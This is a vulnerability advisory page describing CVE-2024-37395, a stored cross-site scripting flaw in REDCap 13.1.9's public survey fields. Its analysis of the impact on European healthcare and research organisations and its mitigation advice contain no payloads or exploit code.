Skip to main content

CVE-2024-37395: n/a in n/a

High
VulnerabilityCVE-2024-37395cvecve-2024-37395
Published: Tue Jun 10 2025 (06/10/2025, 00:00:00 UTC)
Source: CVE Database V5
Vendor/Project: n/a
Product: n/a

Description

A stored cross-site scripting (XSS) vulnerability in the Public Survey function of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Survey Title' and 'Survey Instructions' fields. This vulnerability could be exploited by attackers to execute malicious scripts when the survey is accessed through its public link. It is advised to update to version 14.2.1 or later to fix this issue.

AI-Powered Analysis

AILast updated: 07/10/2025, 20:02:10 UTC

Technical Analysis

CVE-2024-37395 is a stored cross-site scripting (XSS) vulnerability identified in the Public Survey function of REDCap version 13.1.9. REDCap is a widely used secure web application for building and managing online surveys and databases, often employed in academic, clinical, and research environments. The vulnerability arises because authenticated users can inject malicious scripts or HTML code into the 'Survey Title' and 'Survey Instructions' fields. These fields are then rendered without proper sanitization or encoding when the survey is accessed via its public link, leading to the execution of arbitrary web scripts in the context of the victim's browser. This stored XSS can be exploited by an attacker who has authenticated access to the REDCap instance to craft payloads that execute when any user accesses the public survey link, potentially leading to session hijacking, credential theft, or distribution of malware. The vulnerability affects REDCap version 13.1.9 and is resolved in version 14.2.1 or later. No CVSS score is assigned yet, and there are no known exploits in the wild at the time of publication. However, the nature of stored XSS vulnerabilities in public-facing survey tools makes this a significant risk, especially given the sensitive data often handled by REDCap deployments.

Potential Impact

For European organizations, especially those in healthcare, academic research, and clinical trial sectors where REDCap is commonly used, this vulnerability poses a substantial risk. Exploitation could lead to unauthorized access to sensitive personal and medical data, undermining confidentiality and potentially violating GDPR requirements. Attackers could leverage the XSS flaw to steal session cookies, impersonate legitimate users, or distribute malicious payloads to survey respondents, damaging organizational reputation and trust. Given that REDCap surveys are often distributed widely via public links, the attack surface is broad, increasing the likelihood of victim exposure. Additionally, compromised surveys could be used to manipulate data integrity or disrupt availability by injecting scripts that alter survey behavior or cause denial of service. The impact extends beyond individual organizations to potentially affect collaborative research projects and multi-institutional studies common in Europe.

Mitigation Recommendations

To mitigate this vulnerability, European organizations using REDCap should urgently upgrade to version 14.2.1 or later, where the issue is fixed. Beyond patching, administrators should implement strict input validation and output encoding on all user-supplied content fields, especially those rendered in public-facing components. Employing Content Security Policy (CSP) headers can help limit the impact of any injected scripts by restricting the sources from which scripts can be loaded. Regular security audits and penetration testing focused on web application vulnerabilities should be conducted to detect similar issues proactively. Additionally, organizations should review user access controls to limit authenticated user permissions, reducing the risk of malicious payload injection. Educating users about phishing and social engineering risks related to malicious survey links can also reduce exploitation likelihood. Finally, monitoring web logs for unusual activity on survey endpoints can provide early detection of exploitation attempts.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2024-06-07T00:00:00.000Z
Cvss Version
null
State
PUBLISHED

Threat ID: 68487f501b0bd07c393899d0

Added to database: 6/10/2025, 6:54:08 PM

Last enriched: 7/10/2025, 8:02:10 PM

Last updated: 8/15/2025, 6:18:35 AM

Views: 10

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats